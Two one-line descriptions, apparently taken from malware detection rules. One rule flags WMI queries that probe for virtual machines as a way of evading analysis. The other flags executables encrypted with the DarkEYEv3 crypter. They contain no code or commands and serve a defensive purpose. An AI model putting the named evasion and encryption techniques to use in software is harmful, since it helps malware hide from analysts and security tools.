Detects discovery of virtual appliances through the use of WMI, performed for evasion purposes.
Rule to detect DarkEYEv3 encrypted executables (often malware)